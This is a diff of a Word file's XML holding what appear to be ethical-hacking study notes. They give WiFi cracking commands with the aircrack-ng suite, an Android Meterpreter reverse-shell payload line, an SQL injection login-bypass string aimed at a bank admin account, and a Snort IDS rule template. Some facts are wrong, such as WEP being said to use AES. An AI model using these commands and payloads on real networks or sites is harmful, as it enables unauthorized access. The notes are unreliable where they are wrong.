-      <w:r>
-        <w:t xml:space="preserve"> only bind mac address will work on router but there is a possibility of mac spoofing.</w:t>
+        <w:t>MAC binding /ACL : This is similar to mac filtering in present scenario, i.e only bind mac address will work on router but there is a possibility of mac spoofing.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13481,13 +11301,8 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>WEP :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Wired Equivalent Privileges. Uses AES algorithm.</w:t>
+      <w:r>
+        <w:t>WEP : Wired Equivalent Privileges. Uses AES algorithm.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13502,15 +11317,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">WPA and WPA2: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Protection Access. WPA2 is just the second generation of WPA. Uses hashing algorithms for passwords.</w:t>
+        <w:t>WPA and WPA2: Wifi Protection Access. WPA2 is just the second generation of WPA. Uses hashing algorithms for passwords.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13525,39 +11332,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">RADIUS: Remote Authentication Dial </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>In</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> User Service. In corporate companies sharing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> passwords can also lead to data loss or lead to attacks so what they do is use RADIUS protocols. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>When ever</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a user asking for a connection to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the router will simply ask for username and password. The router on accepting the credential it will gets it authenticated from the Domain server of the company. The router contains the address of the domain name server.</w:t>
+        <w:t>RADIUS: Remote Authentication Dial In User Service. In corporate companies sharing wifi passwords can also lead to data loss or lead to attacks so what they do is use RADIUS protocols. When ever a user asking for a connection to the wifi the router will simply ask for username and password. The router on accepting the credential it will gets it authenticated from the Domain server of the company. The router contains the address of the domain name server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13568,76 +11343,55 @@
       </w:pPr>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>wifi hack</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Doing a hack on WPA2 is very difficult but still the WEP and WPA-PSK provide only enough security to stop a newbie to cyber security field.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To perform the hack we need to have a network wifi card that can be put into monitor mode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> hack</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Doing a hack on WPA2 is very difficult but still the WEP and WPA-PSK provide only enough security to stop a newbie to cyber security field.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">To perform the hack we need to have a network </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> card that can be put into monitor mode.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Airmon-ng start wlan0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Next when the wifi card is in monitor mode capture the packet data using:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Airmon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>-ng start wlan0.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Next when the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> card is in monitor mode capture the packet data using:</w:t>
+        <w:t>Airodump-ng –w wep –c &lt;channel&gt; - -bssid &lt;mac address&gt;  &lt;monitormode instance&gt;.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13646,299 +11400,99 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Airodump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>Here both the channel and the mac address are of the target wifi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now to crack the password use aircrack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">-ng –w </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>wep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>Aircrack-ng &lt;filename.cap&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>When you store packets the IV{ Initialization Vector}. These contain the passwords encrypted but can be cracked. The WEP cracking is simple if we have traffic but cracking a WAP-PSK is a bit difficult since we need to at least analyse over 40,000 packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Some important terms:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Wardriving: cracking w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ifi while moving fast .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Warchalking: Mapping of wifi networks with the help of symbols.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> –c &lt;channel&gt; - -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>bssid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Mobile hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Similar to other Trojan attacks this is also done with metasploit and few assumptions. We assume that the device android and it uses an older updated version.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Procedure: almost similar to the other metasploit attacks. The only thing that changes is the type of payload.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> &lt;mac address</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>&gt;  &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>monitormode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> instance&gt;.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Here both the channel and the mac address are of the target </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Now to crack the password use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aircrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Aircrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>-ng &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>filename.cap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">When you store packets the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>IV{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Initialization Vector}. These contain the passwords encrypted but can be cracked. The WEP cracking is simple if we have traffic but cracking a WAP-PSK is a bit difficult since we need to at least analyse over 40,000 packets.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Some important terms:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wardriving</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: cracking </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> while moving </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>fast .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Warchalking</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: Mapping of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> networks with the help of symbols.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Mobile hacking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Similar to other Trojan attacks this is also done with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and few assumptions. We assume that the device android and it uses an older updated version.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Procedure: almost similar to the other </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> attacks. The only thing that changes is the type of payload.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>set</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> payload android/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>set payload android/meterpreter/reverse_tcp</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13970,7 +11524,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId130">
+                    <a:blip r:embed="rId131">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14019,16 +11573,8 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">NOTE: security is needed as much as the value of the data or anything </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>is .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>NOTE: security is needed as much as the value of the data or anything is .</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14058,23 +11604,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Crypt-secret and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>graphy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-write. In a way we can say converting a secret data to a different </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>form ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and back using cipher.</w:t>
+        <w:t>Crypt-secret and graphy-write. In a way we can say converting a secret data to a different form , and back using cipher.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14097,15 +11627,7 @@
         <w:t xml:space="preserve">Symmetric- </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">This is one of the starting kinds of cryptography. The cipher key used for both encryption and decryption is the same. The main disadvantage of this kind is how </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>are you</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> going to send the key to the receiver without anyone knowing it. </w:t>
+        <w:t xml:space="preserve">This is one of the starting kinds of cryptography. The cipher key used for both encryption and decryption is the same. The main disadvantage of this kind is how are you going to send the key to the receiver without anyone knowing it. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14125,34 +11647,14 @@
       <w:r>
         <w:t xml:space="preserve">This has many algorithms: RSA, DSA, elliptic curve and </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>diffie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>hellman</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>diffie hellman</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">The best part of asymmetric cryptography is we can eliminate all the disadvantages in symmetric cryptography. There is no need to transfer of key safely nor do we need to worry even if the key is hands of an attacker. In this we take a different approach to encrypt and decrypt data. The process involves generating a private and public pair. The public can be sent to your receivers or can even be broadcasted. The data that needs to be sent will be encrypted with a public key and sent to the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>host(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>sender of the public key). Now the data that is encrypted with a public can only be decrypted with the help of its counter private key. Now there is a possibility that a person can fake the ID and send a public key for sharing. How can we say that he is the legitimate person to whom our data can be sent? Here comes the part of certifying the key. There will be a trusted third part that gathers some information from the sender of the key and authenticates and certifies he is the legitimate person to whom you want to send data.</w:t>
+        <w:t>The best part of asymmetric cryptography is we can eliminate all the disadvantages in symmetric cryptography. There is no need to transfer of key safely nor do we need to worry even if the key is hands of an attacker. In this we take a different approach to encrypt and decrypt data. The process involves generating a private and public pair. The public can be sent to your receivers or can even be broadcasted. The data that needs to be sent will be encrypted with a public key and sent to the host(sender of the public key). Now the data that is encrypted with a public can only be decrypted with the help of its counter private key. Now there is a possibility that a person can fake the ID and send a public key for sharing. How can we say that he is the legitimate person to whom our data can be sent? Here comes the part of certifying the key. There will be a trusted third part that gathers some information from the sender of the key and authenticates and certifies he is the legitimate person to whom you want to send data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14163,37 +11665,226 @@
           <w:numId w:val="37"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>one</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> way hashing-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> In this method we don’t have any keys for sharing nor any encryption or decryptions . All we have is hashing the data. The data that needs to be secured will be hashed. There no way back after hashing the data. All we have to do is try different </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>possibilities ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> hash them and compare them with the hash they have.</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t>one way hashing-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> In this method we don’t have any keys for sharing nor any encryption or decryptions . All we have is hashing the data. The data that needs to be secured will be hashed. There no way back after hashing the data. All we have to do is try different possibilities , hash them and compare them with the hash they have.</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>IDS and IPS (Intrusion detection system and intrusion prevention system)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>IDS-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">An intrusion detection system (IDS) is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId132" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>anomaly detection</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and reporting is the primary function, some intrusion detection systems are capable of taking actions when malicious acitivity or anomalous traffic is detected, including blocking traffic sent from suspicious </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId133" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>IP addresses</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>IPS-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">An </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId134" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>intrusion prevention system</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> (IPS) also monitors network </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId135" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>packets</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> for potentially damaging network traffic. But where an intrusion detection system responds to potentially malicious traffic by logging the traffic and issuing warning notifications, intrusion prevention systems respond to such traffic by rejecting the potentially malicious packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>For a brief explanation of this concept reach websites.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Any of the intrusion detection or prevention can be done with the help of snort, preinstalled tool in Backtrack but not in any other linux OS. There are also other third party tools that can perform the same. But here’s what snort can do.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Snort</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The advantages of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Snort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are numerous. According to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>snort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> web site, “It can perform protocol analysis, content searching/matching, and can be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>used</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ilfuvd"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to detect a variety of attacks and probes, such as buffer overflow, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more” (Caswell).</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Experiment – To perform this experiment you need snort, that says you either need backtrack or snort installed in kali.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The snort tool will reside at etc/snort.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>First we need to add a path for the new rule we are going to create so open snort.conf file, go to the 832</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>nd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> line and add the path. The syntax can be taken from the other path written there.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now to go rules directory and create a file with the rules you want to add.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>“alert” is for IDS while “drop” is for IPS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>After saving the folder restart the snort service. If there are no errors it will start capturing and analysing the packets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We can see the alerts at </w:t>
+      </w:r>
+      <w:r>
+        <w:t>/var/log/snort and in alert file the alerts are written.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Note -  sometimes it takes a bit of time for the system to add the alerts to the files so wait patiently.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Example rule for detecting and usage of particular website: </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t>alert tcp any any -&gt; any any (msg:”some message”; content:”website url”; sid:&lt;uniqueid&gt;; rev:1;)</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
@@ -14202,20 +11893,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>IDS and IPS (Intrusion detection system and intrusion prevention system)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Injection attack</w:t>
       </w:r>
     </w:p>
@@ -14277,15 +11954,7 @@
         <w:t>To enter a banks admin account just any random user name and in</w:t>
       </w:r>
       <w:r>
-        <w:t>ject the script in the password field. Script- “  ’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>or’x</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>’=’x “ .</w:t>
+        <w:t>ject the script in the password field. Script- “  ’or’x’=’x “ .</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14293,23 +11962,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This script is translated into a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> query – select * from employ in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>db</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where username=”” and password=””.</w:t>
+        <w:t>This script is translated into a sql query – select * from employ in db where username=”” and password=””.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14347,7 +12000,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId131" cstate="print">
+                    <a:blip r:embed="rId136" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
